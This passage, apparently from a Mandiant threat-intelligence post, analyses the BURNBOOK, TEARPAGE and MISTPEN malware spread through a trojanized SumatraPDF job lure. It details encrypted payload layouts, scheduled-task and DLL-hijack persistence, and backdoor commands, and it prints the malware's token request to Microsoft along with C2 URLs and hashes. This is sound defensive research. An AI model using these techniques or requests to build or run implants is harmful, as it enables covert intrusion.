style="vertical-align: baseline;">File</strong></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><strong style="vertical-align: baseline;">Description</strong></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">BAE_VICE President of Business Development.pdf</strong></p> <p><span style="vertical-align: baseline;">(MD5: 28a75771ebdb96d9b49c9369918ca581)</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">An encrypted file containing both the PDF lure displayed to the user and the MISTPEN backdoor</span></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">libmupdf.dll</strong></p> <p><span style="vertical-align: baseline;">(MD5: 57e8a7ef21e7586d008d4116d70062a6)</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">A trojanized dynamic-link library (DLL) file required by SumatraPDF.exe, tracked as BURNBOOK. This file is a dropper for an embedded DLL, "wtsapi32.dll", which is tracked as TEARPAGE</span><strong style="vertical-align: baseline;"> </strong><span style="vertical-align: baseline;">and</span><strong style="vertical-align: baseline;"> </strong><span style="vertical-align: baseline;">used to execute the MISTPEN backdoor after the system is rebooted.</span></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">PdfFilter.dll</strong></p> <p><span style="vertical-align: baseline;">(MD5: cefc7b6e95f5a985b7319021441ae4e7)</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">A legitimate DLL file required by SumatraPDF.exe</span></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">PdfPreview.dll</strong></p> <p><span style="vertical-align: baseline;">(MD5: 2505610c490d24a98da730100175f262)</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">A legitimate DLL file required by SumatraPDF.exe</span></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">SumatraPDF.exe</strong></p> <p><span style="vertical-align: baseline;">(MD5: 91841e006225ac500de7630740a21d91)</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">A legitimate open-source PDF viewer application component, version 3.3.3</span></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <div style="color: #5f6368; overflow: auto hidden; width: 100%; text-align: center;"><span style="vertical-align: baseline; font-style: italic; color: #5f6368; display: block; font-size: 16px; margin-top: 8px; width: 100%;">Table 1: Files in ZIP archive received through WhatsApp chat</span></div> </div> </div></div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">Based on the surrounding context, the user was likely instructed to open the PDF file with the enclosed trojanized PDF viewer program based on the open-source project SumatraPDF. As previously stated, this technique did not employ a vulnerability in the original SumatraPDF source code.</span></p> <p><span style="vertical-align: baseline;">SumatraPDF is an open-source document viewing application that is capable of viewing multiple document file formats such as PDF, XPS, and CHM, along with many more. Its </span><a href="https://github.com/sumatrapdfreader/sumatrapdf" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">source code</span></a><span style="vertical-align: baseline;"> is publically available. </span></p> <p><span style="vertical-align: baseline;">When accessed this way, the DLL files are loaded by the </span><code style="vertical-align: baseline;">SumatraPDF.exe</code><span style="vertical-align: baseline;"> executable, including the trojanized </span><code style="vertical-align: baseline;">libmupdf.dll</code><span style="vertical-align: baseline;"> file representing the first stage of the infection chain. This file is responsible for decrypting the contents of </span><code style="vertical-align: baseline;">BAE_Vice President of Business Development.pdf</code><span style="vertical-align: baseline;">, thus allowing the job description document to be displayed as well as loading into memory the payload named MISTPEN. Mandiant found that later versions (after 3.4.3) of SumatraPDF implement countermeasures to prevent modified versions of this DLL from being loaded.</span></p> <p><span style="vertical-align: baseline;">MISTPEN is a trojanized version of a legitimate Notepad++ plugin, </span><code style="vertical-align: baseline;">binhex.dll</code><span style="vertical-align: baseline;">, which contains a backdoor.</span></p> <p><code style="vertical-align: baseline;">Libmupdf.dll</code><span style="vertical-align: baseline;"> also writes the encrypted backdoor to disk into a new file named </span><code style="vertical-align: baseline;">thumbs.ini</code><span style="vertical-align: baseline;"> and creates a scheduled task named </span><code style="vertical-align: baseline;">Sumatra Launcher</code><span style="vertical-align: baseline;"> to execute the backdoor daily using the legitimate Windows binary </span><code style="vertical-align: baseline;">BdeUISrv.exe</code><span style="vertical-align: baseline;">,</span><strong style="vertical-align: baseline;"> </strong><span style="vertical-align: baseline;">which loads the </span><code style="vertical-align: baseline;">wtsapi32.dll</code><strong style="vertical-align: baseline;"> </strong><span style="vertical-align: baseline;">file through DLL search-order hijacking.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/original_images/mistpen-fig3a.jpeg" alt="Infection lifecycle diagram"> </a> <figcaption class="article-image__caption "><p data-block-key="fkgmh">Figure 3: Infection lifecycle diagram</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><h2><span style="vertical-align: baseline;">Analysis of BURNBOOK (libmupdf.dll)</span></h2> <p><span style="vertical-align: baseline;">BURNBOOK is a launcher written in C/C++ that is capable of executing an encrypted payload stored in a file and writing it to disk. </span></p> <p><span style="vertical-align: baseline;">This file is a modified version of a legitimate DLL file used by the </span><code style="vertical-align: baseline;">SumatraPDF.exe</code><span style="vertical-align: baseline;"> binary. The DLL contains malicious code that is triggered when the user opens the PDF lure (</span><code style="vertical-align: baseline;">BAE_Vice President of Business Development.pdf</code><span style="vertical-align: baseline;">) using the provided </span><code style="vertical-align: baseline;">SumatraPDF.exe</code><span style="vertical-align: baseline;"> file.</span></p> <p style="text-align: justify;"><code style="vertical-align: baseline;">BAE_Vice President of Business Development.pdf</code><span style="vertical-align: baseline;"> has the following structure and contents:</span></p></div> <div class="block-paragraph_advanced"><div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table border="1px" cellpadding="16px" style="border-collapse: collapse; margin-left: auto; margin-right: auto;"><colgroup><col/><col/></colgroup> <tbody> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><strong style="vertical-align: baseline;">File Offset</strong></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><strong style="vertical-align: baseline;">Value Description</strong></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">0x0 - 0x7</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Offset used to determine the end of the encrypted PDF file</span></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">0x8 - 0x27</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">ChaCha20 key</span></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">0x28 - 0x33</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">ChaCha20 nonce</span></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">0x34 - [PDF Offset]</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Encrypted PDF file</span></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">0x4DF1D - 0x4DF24</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Size of the encrypted DLL</span></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">0x4DF25 - EOF</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Encrypted DLL</span></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <div align="left" style="text-align: center;"><span style="vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Table 2: PDF lure structure and contents</span></div></div> <div class="block-paragraph_advanced"><h3><span style="vertical-align: baseline;">Phase 1: Initial Setup and Decryption</span></h3> <p><span style="vertical-align: baseline;">The sample commences by reading the first 8 bytes of the PDF file, storing this value as a marker to determine the end of the embedded encrypted PDF file. The next 32 bytes (key) and 12 bytes (nonce) are read from the file and used to initialize a ChaCha20 cipher. The cipher's initial state is stored in memory. </span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/mistpen-fig4.max-1000x1000.png" alt="The ChaCha20 cipher is initialized"> </a> <figcaption class="article-image__caption "><p data-block-key="mzocw">Figure 4: The ChaCha20 cipher is initialized</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">The remaining bytes (starting from offset 0x34 and looping until the PDF offset is reached) are decrypted in chunks of 0x1000 (4096) bytes using the ChaCha20 cipher. The decrypted data, representing a PDF file, is written to the system's temporary folder and will be displayed by the PDF viewer if the sample passes a network connectivity check to </span><code style="vertical-align: baseline;">google[.]com</code><span style="vertical-align: baseline;">.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/mistpen-fig5.max-1000x1000.png" alt="The embedded PDF file is decrypted using the cipher"> </a> <figcaption class="article-image__caption "><p data-block-key="wem5x">Figure 5: The embedded PDF file is decrypted using the cipher</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><h3><span style="vertical-align: baseline;">Phase 2: Backdoor Extraction and Execution</span></h3> <p><span style="vertical-align: baseline;">Upon reaching the offset retrieved in the first phase, the function reads 8 bytes signifying the size of the encrypted backdoor DLL, which is subsequently read from the file. </span><span style="vertical-align: baseline;">The same ChaCha20 cipher (without resetting) is used to decrypt the backdoor DLL, which is then reflectively loaded into the memory space of </span><code style="vertical-align: baseline;">SumatraPDF.exe</code><span style="vertical-align: baseline;"> and executed.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/mistpen-fig6.max-1000x1000.png" alt="The backdoor DLL (MISTPEN) is decrypted"> </a> <figcaption class="article-image__caption "><p data-block-key="wem5x">Figure 6: The backdoor DLL (MISTPEN) is decrypted</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><h3><span style="vertical-align: baseline;">Phase 3: Persistence and Re-Encryption</span></h3> <p><span style="vertical-align: baseline;">The sample extracts </span><code style="vertical-align: baseline;">wtsapi32.dll</code><span style="vertical-align: baseline;"> from its resource section and copies </span><code style="vertical-align: baseline;">BdeUISrv.exe</code><span style="vertical-align: baseline;"> from the System32 directory, placing both files in the </span><code style="vertical-align: baseline;">%APPDATA%\Microsoft\BDE UI Launcher</code><span style="vertical-align: baseline;"> directory for persistence. Following this, the ChaCha20 cipher is reset</span><span style="vertical-align: baseline;">, with the original key and nonce being reused to re-encrypt the in-memory DLL containing the backdoor code.</span><span style="vertical-align: baseline;"> The re-encrypted data, along with the key and nonce, are written to </span><code style="vertical-align: baseline;">%APPDATA%\Thumbs.ini</code><span style="vertical-align: baseline;">. These steps ensure that </span><code style="vertical-align: baseline;">Thumbs.ini</code><span style="vertical-align: baseline;"> and the </span><span style="vertical-align: baseline;">PDF</span><span style="vertical-align: baseline;"> file both contain the same encrypted DLL but with different ciphertexts.</span></p> <p><span style="vertical-align: baseline;">Finally, the sample creates a scheduled task named </span><code style="vertical-align: baseline;">Sumatra Launcher</code><span style="vertical-align: baseline;">,</span><span style="vertical-align: baseline;"> which executes </span><code style="vertical-align: baseline;">%APPDATA%\Microsoft\BDE UI Launcher\BdeUISrv.exe</code><span style="vertical-align: baseline;"> daily when the user logs in. This is further discussed under the analysis of TEARPAGE.</span></p> <h2><span style="vertical-align: baseline;">Analysis of MISTPEN</span></h2> <p><span style="vertical-align: baseline;">MISTPEN is a lightweight backdoor written in C whose main functionality is to download and execute Portable Executable (PE) files.</span></p> <p><span style="vertical-align: baseline;">The backdoor is a modification of the open-source </span><a href="https://github.com/skycc86/npp_binhex_plugin" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Notepad++ binhex plugin</span></a><span style="vertical-align: baseline;"> v2.0.0.1 where the creation of a thread that executes the malicious code has been added to the </span><code style="vertical-align: baseline;">DllMain</code><span style="vertical-align: baseline;"> function.</span></p> <p><span style="vertical-align: baseline;">MISTPEN decrypts a token using AES with the key </span><code style="vertical-align: baseline;">EF 0D 4E A6 D8 B8 E8 73 DF 17 5C 0B 51 F6 3B 33</code><span style="vertical-align: baseline;">, which is then used to access a Microsoft API endpoint in the following request:</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>Request type: POST Request URI: https://login.microsoftonline.com/common/oauth2/v2.0/token" Body: grant_type=refresh_token &amp;refresh_token=0.AScAuGeUx8-5OkufugCaUtV EuwXupyYCVnZNp7rq6Le2eUEnAME.AgABAwEAAADnfolhJpSnRYB1SVj-Hgd8 AgDs_wUA9P_z3EI-It1YbdHPtZaMoegHpfKNHgO9rjjC9plVmHfYhva9utOdkzbp o-p4m5uoLzuQu9kJmCqXpdDteicUF5Fd7XfcVBpe5Vu1TOhxQoP-k1HJmiLRg GcdzWMa3aYVzdfnNsAlV8n-061gnUDKNxHYL4xTz1jymmhRGzZ1KOOiJLs7e j0A8fMNSqvTwp_UF7upYw5yI81UTRsBN9hbpGpLnMb_WIOMvX-Bcm3CtCHjf Lzij1n... &lt;REDACTED&gt;</code></pre></div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">This MISTPEN sample communicates over HTTP with the following Microsoft Graph URLs:</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><code style="vertical-align: baseline;">hxxps[:]//login[.]microsoftonline[.]com/common/oauth2/v2.0/token</code></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><code style="vertical-align: baseline;">hxxps[:]//graph[.]microsoft[.]com/v1.0/me/drive/root:/path/upload/hello/</code></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><code style="vertical-align: baseline;">hxxps://graph.microsoft[.]com/v1.0/me/drive/root:/path/upload/world/</code></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><code style="vertical-align: baseline;">hxxps://graph.microsoft[.]com/v1.0/me/drive/items/</code></p> </li> </ul> <p><span style="vertical-align: baseline;">The backdoor reads configuration data from the file <code>setup.bin</code> if it exists within the same directory. The configuration data includes the sleep time and an ID. The backdoor sleeps for the configured time and sends the message "</span><code style="vertical-align: baseline;">Hi,I m just woke up!</code><span style="vertical-align: baseline;">" to its command-and-control (C2 or C&amp;C) server.</span></p> <p><span style="vertical-align: baseline;">Otherwise, the backdoor generates a random hexadecimal ID and sends the time and timezone to its C2. If the backdoor fails to get the time information, the backdoor sends the message "</span><code style="vertical-align: baseline;">Hi,I am New</code><span style="vertical-align: baseline;">" to its C2 instead.</span></p> <p><span style="vertical-align: baseline;">On the infected host, Mandiant observed a suspicious network connection from the </span><code style="vertical-align: baseline;">SumatraPDF.exe</code><span style="vertical-align: baseline;"> process towards a compromised SharePoint domain belonging to a university. As this connection occurred after MISTPEN execution, Mandiant assesses that the SharePoint URL was part of the in-memory execution of payloads sent to the backdoor after establishing communication with the C2, leaving no other traces on disk.</span></p> <p><span style="vertical-align: baseline;">The backdoor includes code to support more than one token, selecting randomly the one to use.</span></p> <h3><span style="vertical-align: baseline;">Backdoor Commands</span></h3> <p><span style="vertical-align: baseline;">The backdoor supports the following commands:</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><code style="vertical-align: baseline;">d</code><span style="vertical-align: baseline;">: The backdoor parses, loads into memory, and executes the received PE payload. The backdoor sends a message to its C2 that contains the result from the executed code or the string: "</span><code style="vertical-align: baseline;">Loaded at &lt;p&gt;</code><span style="vertical-align: baseline;">" where </span><code style="vertical-align: baseline;">&lt;p&gt;</code><span style="vertical-align: baseline;"> is a hexadecimal address.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><code style="vertical-align: baseline;">e</code><span style="vertical-align: baseline;">: The backdoor sends the message "</span><code style="vertical-align: baseline;">DEAD"</code><span style="vertical-align: baseline;"> to its C2 and terminates the process.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><code style="vertical-align: baseline;">f</code><span style="vertical-align: baseline;">: The backdoor sends the message "</span><code style="vertical-align: baseline;">Sleep Success</code><span style="vertical-align: baseline;">" to its C2, sleeps for the specified time, and sends the message "</span><code style="vertical-align: baseline;">Hi,I m just woke up!</code><span style="vertical-align: baseline;">" to its C2.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><code style="vertical-align: baseline;">g</code><span style="vertical-align: baseline;">: The backdoor sends the message "</span><code style="vertical-align: baseline;">Hiber Success</code><span style="vertical-align: baseline;">" to its C2 , updates the sleep time in the configuration with the received time, writes its configuration to </span><code style="vertical-align: baseline;">setup.bin</code><span style="vertical-align: baseline;">, and sleeps for the configured time.</span></p> </li> </ul> <h2><span style="vertical-align: baseline;">Analysis of TEARPAGE (wtsapi32.dll)</span></h2> <p><span style="vertical-align: baseline;">TEARPAGE, a loader embedded within the resource section of BURNBOOK, is loaded through DLL search order hijacking by the legitimate </span><code style="vertical-align: baseline;">BdeUISrv.exe</code><span style="vertical-align: baseline;"> binary copied by the malware from its original location to the directory containing the loader. TEARPAGE</span><span style="vertical-align: baseline;"> </span><span style="vertical-align: baseline;">decrypts an encrypted blob contained in the file </span><code style="vertical-align: baseline;">%APPDATA%\Thumbs.ini</code><span style="vertical-align: baseline;">. Table 3 describes the structure of this file:</span></p></div> <div class="block-paragraph_advanced"><div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table border="1px" cellpadding="16px" style="border-collapse: collapse; margin-left: auto; margin-right: auto;"><colgroup><col/><col/></colgroup> <tbody> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><strong style="vertical-align: baseline;">File Offset</strong></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><strong style="vertical-align: baseline;">Value Description</strong></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">0x0 - 0x1F</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">ChaCha20 key</span></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">0x20 - 0x2B</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">ChaCha20 nonce</span></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">0x2C - EOF</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Encrypted backdoor DLL</span></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <div align="left" style="text-align: center;"><span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"><span style="vertical-align: baseline;">Table 3: </span><code style="vertical-align: baseline;">%APPDATA%\Thumbs.ini</code><span style="vertical-align: baseline;"> structure</span></span></div></div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">The sample retrieves the initial 32 bytes and the subsequent 12 bytes from </span><code><span style="vertical-align: baseline;">%APPDATA%\Thumbs.ini</span></code><span style="vertical-align: baseline;">, utilizing these values as the key and nonce respectively for the initialization of a ChaCha20 cipher. This cipher is then employed to decrypt the remaining contents of the file.</span></p> <p><span style="vertical-align: baseline;">The resulting decrypted output is the MISTEPN backdoor, which is subsequently reflectively loaded into the memory space of </span><code><span style="vertical-align: baseline;">BdeUISrv.exe</span></code><span style="vertical-align: baseline;"> and executed.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/mistpen-fig7.max-1000x1000.png" alt="A pseudocode representation of the malicious code in wtsapi32.dll"> </a> <figcaption class="article-image__caption "><p data-block-key="r6d1q">Figure 7: A pseudocode representation of the malicious code in wtsapi32.dll</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><h2><span style="vertical-align: baseline;">Sample Comparison</span></h2> <p><span style="vertical-align: baseline;">Through open-source investigation, Mandiant identified a similar malicious archive containing the same </span><code><span style="vertical-align: baseline;">SumatraPDF.exe</span></code><span style="vertical-align: baseline;"> binary; however, there are a few key differences in the BURNBOOK and MISTPEN samples as compared to specimens analyzed earlier in the post. Moreover, this second archive was created prior to the one discussed throughout this blog post. By highlighting the noticeable differences, we can clearly see an evolution in malware capabilities and stealthiness.</span></p> <h3><span style="vertical-align: baseline;">Missing Internet Connectivity Check in BURNBOOK</span></h3> <p><span style="vertical-align: baseline;">The BURNBOOK sample we analyzed includes a network connectivity check that prevents the trojanized reader from displaying the decrypted PDF lure if it cannot reach </span><code><span style="vertical-align: baseline;">google[.]com</span></code><span style="vertical-align: baseline;">. This feature is not present in the earlier sample.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/mistpen-fig8a.max-1000x1000.png" alt="BURNBOOK earlier version"> </a> <figcaption class="article-image__caption "><p data-block-key="r6d1q">Figure 8: BURNBOOK earlier version</p></figcaption> </figure> </div> </div> </div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/mistpen-fig9.max-1000x1000.png" alt="BURNBOOK later version with connection check"> </a> <figcaption class="article-image__caption "><p data-block-key="r6d1q">Figure 9: BURNBOOK later version with connection check</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><h3><span style="vertical-align: baseline;">Missing Command </span><span style="font-style: italic; vertical-align: baseline;">g</span><span style="vertical-align: baseline;"> in MISTPEN</span></h3> <p><span style="vertical-align: baseline;">The MISTPEN sample we analyzed supports the </span><span style="vertical-align: baseline;">g</span><span style="vertical-align: baseline;"> command, which instructs the backdoor to save its configuration to a file named </span><span style="vertical-align: baseline;">setup.bin</span><span style="vertical-align: baseline;">. This file is also read by the backdoor when it first executes and thus allows MISTPEN to make its configuration persistent on the host. The earlier sample does not support this command, does not reference </span><span style="vertical-align: baseline;">setup.bin</span><span style="vertical-align: baseline;">, and does not save its configuration to disk.</span></p> <h3><span style="vertical-align: baseline;">Different C2 Infrastructure</span></h3> <p><span style="vertical-align: baseline;">The MISTPEN sample delivered by the earlier malicious archive does not communicate using Microsoft Graph and instead employs a set of HTTPS URLs consisting of compromised WordPress websites belonging to small businesses from across the world:</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><code style="vertical-align: baseline;">hxxps://bmtpakistan[.]com/solution/wp-content/plugins/one-click-demo-import/assets/asset.php</code><span style="vertical-align: baseline;"> — Construction company in Karachi, Pakistan</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><code style="vertical-align: baseline;">hxxps://cmasedu[.]com/wp-content/plugins/kirki/inc/script.php</code><span style="vertical-align: baseline;"> — Education service company based in Riyadh, Saudi Arabia</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><code style="vertical-align: baseline;">hxxps://dstvdtt.co[.]za/wp-content/plugins/social-pug/assets/lib.php</code><span style="vertical-align: baseline;"> — Television installation company in South Africa</span></p> </li> </ul> <p><span style="vertical-align: baseline;">Furthermore, the </span><span style="vertical-align: baseline;">d</span><span style="vertical-align: baseline;"> function in the earlier MISTPEN sample has a different implementation that uses an additional HTTP request in order to receive and parse PE files from the C2 server.</span></p> <p><span style="vertical-align: baseline;">The usage of the AES encryption is also different in the two samples observed. The earlier sample uses AES to decrypt HTTPS URLs, while the later sample uses it to decrypt the token used to access the Microsoft Graph API.</span></p> <p><span style="vertical-align: baseline;">Based on the differences we have highlighted, the threat actor has improved their malware over time by implementing new features and adding a network connectivity check to hinder the analysis of the samples.</span></p></div> <div class="block-paragraph_advanced"><h2><span style="vertical-align: baseline;">Threat Actor Spotlight: UNC2970</span></h2> <p><span style="vertical-align: baseline;">In June 2024, Mandiant Managed Defense responded to an intrusion leveraging a job-themed phishing email to social engineer a victim to download a malicious archive from WhatsApp. The archive contained both the job description specifics and the implant components targeting a multinational energy company. </span></p> <p><span style="vertical-align: baseline;">Mandiant Managed Defense has reported </span><a 